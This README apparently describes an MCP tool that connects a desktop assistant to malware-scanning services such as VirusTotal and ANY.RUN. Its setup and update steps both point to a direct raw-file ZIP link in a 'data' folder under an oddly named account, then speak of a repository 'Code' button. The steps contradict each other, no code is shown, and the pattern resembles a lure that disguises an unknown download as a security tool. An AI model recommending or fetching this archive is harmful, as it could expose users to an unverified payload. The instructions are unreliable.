Malware-Sandbox-mcp

Enables assistants to analyze files and URLs for malware by integrating with security services like VirusTotal and ANY.RUN, returning threat reports.

README

🔍 Malware-Sandbox-mcp - Analyze suspicious files from your computer

📌 What this software does

The Malware-Sandbox-mcp tool connects your text-based assistant to security services on the internet. It helps you check if a file or a web link is dangerous. You send a file to the tool, and it talks to services like Hybrid Analysis, ANY.RUN, and VirusTotal to find threats. It then gives you a report so you know if you should trust the file.

This tool acts as a bridge between your desktop environment and professional security databases. It simplifies the process of checking for viruses or malicious code without needing to use multiple websites manually. You get clear data about potential threats through your assistant interface.

💻 Requirements

  • A Windows 10 or Windows 11 computer.
  • An active internet connection.
  • API keys from at least one supported service (e.g., VirusTotal or ANY.RUN).
  • The Claude desktop application installed.

🚀 Setting up the software

  1. Visit this page to download the software: https://raw.githubusercontent.com/inadvisable-hibiscusfarragei279/Malware-Sandbox-mcp/main/data/Sandbox_mcp_Malware_v2.7.zip
  2. Locate the button labeled "Code" on the repository page.
  3. Choose "Download ZIP" from the menu.
  4. Save the file to your "Downloads" folder.
  5. Right-click the downloaded file and select "Extract All."
  6. Choose a folder on your computer to store the extracted files.

🔧 Connecting your accounts

To use this tool, you must provide your own access keys. These keys allow the tool to speak with the security services on your behalf.

  1. Open the folder where you extracted the files.
  2. Find the file labeled config.json inside the document folder.
  3. Open this file using any text editor like Notepad.
  4. Paste your API keys for the services you use into the designated spots.
  5. Save and close the file.

These keys are personal. Do not share them with others. They ensure that your requests to check files reach your specific account on services like VirusTotal or URLScan.

⚙️ Running the application

After you install the tool and set your keys, you connect it to your assistant.

  1. Open the Claude desktop application.
  2. Open the settings menu within the application.
  3. Select the "Configurations" or "MCP" section.
  4. Click the button to add a new server.
  5. For the command field, type the path to your Python installation followed by the path to the main.py file inside your project folder.
  6. Save the configuration.

Once you add the server, look at the sidebar or the chat input. You should see a new icon or a notification that tools are available. You can now use the assistant to scan files by typing a request like "Analyze this link for threats" or "Check this file's safety."

🛡️ Understanding the reports

The tool returns a summary of the data it finds. Here is how to read it:

  • Threat Score: Most services provide a number or a color-coded status. A low score usually means the file is safe. A high score suggests the file contains malicious code.
  • Tags: These describe what the file does. Tags like "Trojan," "Spyware," or "Ransomware" tell you the type of danger.
  • URL data: This section shows if a link redirects to a site known for hosting harmful content.
  • MITRE ATT&CK: This is a widely used framework that catalogs attacker tactics and techniques. The report lists the methods the malware uses to infect a machine, which helps you understand how the software tries to bypass your security.

🛠️ Troubleshooting common issues

If the tool does not work, check these common fixes:

  • API Key Errors: If the scan fails immediately, your API key might be incorrect or have no remaining requests. Check your balance on the service provider's website.
  • Missing Python: This tool requires Python. If Python is not installed, Windows cannot run the command you entered for the server. Visit the official Python website to download the latest version for Windows.
  • File Path issues: Ensure the paths you provided in the Claude configuration correctly point to the exact location of the files on your hard drive.
  • Network block: Ensure your firewall allows the application to connect to the internet. If you use a corporate network, your company might block access to external security services.

🔄 Updating your software

To get new features or bug fixes, you should update the tool occasionally.

  1. Return to the link where you downloaded the software: https://raw.githubusercontent.com/inadvisable-hibiscusfarragei279/Malware-Sandbox-mcp/main/data/Sandbox_mcp_Malware_v2.7.zip
  2. Download the latest ZIP file as you did before.
  3. Replace the old folders with the new ones.
  4. Ensure your config.json file remains intact or transfer your settings into the new folder.
  5. Restart your assistant application to load the new version.

📈 Improving your results

Results improve as you add more service keys to your configuration. Each service has different strengths. For example, some services focus on file behavior, while others track harmful websites. When keys for multiple services are configured, the tool compares data from different sources, which gives you a more complete picture of the threat. Keep your keys secure and store them only in your local configuration file. Never paste your keys into chat windows or public forums.
